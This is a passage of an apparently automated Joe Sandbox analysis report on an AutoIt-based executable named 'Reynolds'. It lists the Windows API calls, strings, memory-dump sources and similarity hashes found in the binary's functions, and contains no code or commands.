                                                                                                        • Part of subcall function 00007FF7AA19F418: SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F46A
                                                                                                        • Part of subcall function 00007FF7AA19F418: GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F485
                                                                                                        • Part of subcall function 00007FF7AA19F418: GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F498
                                                                                                        • Part of subcall function 00007FF7AA19F418: GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F4C3
                                                                                                        • Part of subcall function 00007FF7AA19F418: CreatePen.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F4DA
                                                                                                        • Part of subcall function 00007FF7AA19F418: SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F4EB
                                                                                                        • Part of subcall function 00007FF7AA19F418: SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F4FB
                                                                                                        • Part of subcall function 00007FF7AA19F418: SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F50E
                                                                                                        • Part of subcall function 00007FF7AA19F418: InflateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F535
                                                                                                        • Part of subcall function 00007FF7AA19F418: RoundRect.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F561
                                                                                                        • Part of subcall function 00007FF7AA19F418: GetWindowLongW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F56F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                      • String ID:
                                                                                                      • API String ID: 3521893082-0
                                                                                                      • Opcode ID: f6b3e33df0b6fd49e851f84cb0d7e1a0081305ee093791da2a064367007aa246
                                                                                                      • Instruction ID: 0fb558512430256b723cd2240b5103d224725835d5020850045aa2e0e6826a96
                                                                                                      • Opcode Fuzzy Hash: f6b3e33df0b6fd49e851f84cb0d7e1a0081305ee093791da2a064367007aa246
                                                                                                      • Instruction Fuzzy Hash: 21A1B376F09701E6FB15AB61E84467C6771BB48BB8F954234DE2A03BA4DF3C9446C390

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F45F
                                                                                                      • SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F46A
                                                                                                      • GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F485
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F498
                                                                                                      • CreateSolidBrush.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F4A2
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F4C3
                                                                                                      • CreatePen.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F4DA
                                                                                                      • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F4EB
                                                                                                      • SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F4FB
                                                                                                      • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F50E
                                                                                                      • InflateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F535
                                                                                                      • RoundRect.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F561
                                                                                                      • GetWindowLongW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F56F
                                                                                                      • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F5BC
                                                                                                      • GetWindowTextW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F5F4
                                                                                                      • InflateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F617
                                                                                                      • DrawFocusRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F625
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F634
                                                                                                      • SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F63F
                                                                                                      • DrawTextW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F65D
                                                                                                      • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F67B
                                                                                                      • DeleteObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F689
                                                                                                      • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F697
                                                                                                      • DeleteObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F6A2
                                                                                                      • SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F6AE
                                                                                                      • SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F6BE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                      • String ID:
                                                                                                      • API String ID: 1996641542-0
                                                                                                      • Opcode ID: e7723dbef953c17b05f3a04d1756e8a1bd39c10ad02639bf65342523599ff9cc
                                                                                                      • Instruction ID: 2bf5eb38ce6d8236dfa01b5bcb4fcdf958d99004f523578c1704121b2a88f338
                                                                                                      • Opcode Fuzzy Hash: e7723dbef953c17b05f3a04d1756e8a1bd39c10ad02639bf65342523599ff9cc
                                                                                                      • Instruction Fuzzy Hash: C271AF76A0DA41E6F611AB21F84467AB372FB88BB4F414239DD5E43BA4DF3CD4468710

                                                                                                      Control-flow Graph

                                                                                                      (Rendered graph not reproduced. Basic blocks 7ff7aa0f2340-7ff7aa0f246d and 7ff7aa139fbc-7ff7aa13a1a0; calls subroutines 7ff7aa0f2470 and 7ff7aa0f21a0; APIs referenced in the graph: GetSysColor, SetBkColor, SetTextColor, SetBkMode, GetStockObject, GetWindowLongW, GetClientRect, SendMessageW, GetWindowDC, GetPixel, ReleaseDC.)
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$LongWindow$ModeObjectStockText
                                                                                                      • String ID:
                                                                                                      • API String ID: 554392163-0
                                                                                                      • Opcode ID: cc65a1f5085739bdf730f5a57d68a81d83072d1dd34cd411bf68f0558776c384
                                                                                                      • Instruction ID: 5fcea3add2073f5e00180c08b23f4d8c039f1462f91327c1e97cd8656e8de8ba
                                                                                                      • Opcode Fuzzy Hash: cc65a1f5085739bdf730f5a57d68a81d83072d1dd34cd411bf68f0558776c384
                                                                                                      • Instruction Fuzzy Hash: 8181F872E0D653D5FA75AB24E44427EA3A1EF49764FD60275C99E036F4EE3CA8438320

                                                                                                      Control-flow Graph

                                                                                                      (Rendered graph not reproduced. Basic blocks 2453ca22450-2453ca226fa; APIs referenced in the graph: iswctype, _errno.)
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: iswctype$_errno
                                                                                                      • String ID: 0$0
                                                                                                      • API String ID: 3860680865-203156872

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                      • API String ID: 2091158083-3440237614
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                      • API String ID: 258715311-1154884017
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$File$CloseCreateHandleObject$#418AllocCopyDeleteFreeImageLockMessageReadSendSizeStreamUnlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 2779716855-0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                      • API String ID: 0-3931177956
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: NULL Pointer assignment
                                                                                                      • API String ID: 0-2785691316
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: o$o$o$o$o$o
                                                                                                      • API String ID: 0-2858737866
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                      • String ID: P
                                                                                                      • API String ID: 1460738036-3110715001
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LoadStringwprintf
                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                      • API String ID: 3297454147-3080491070
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                      • API String ID: 4051287042-2268648507
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1974058525-0
APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
Similarity
• API ID: iswctype
• String ID: 0$0
• API String ID: 304682654-203156872
APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend
• String ID: P
• API String ID: 1268354404-3110715001
APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: LoadStringwprintf
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 3297454147-2391861430
APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
• String ID: static
• API String ID: 3821898125-2160076837
APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
Similarity
• API ID: fputc
• String ID: .
• API String ID: 1992160199-248832578
APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
• String ID: Include$Software\AutoIt v3\AutoIt$\Include\
• API String ID: 2667193904-1575078665
APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
Similarity
• API ID: fwprintf$fputwcstrlen
• String ID: %*.*S$%-*.*S$%.*S
• API String ID: 3854221471-2115465065
APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
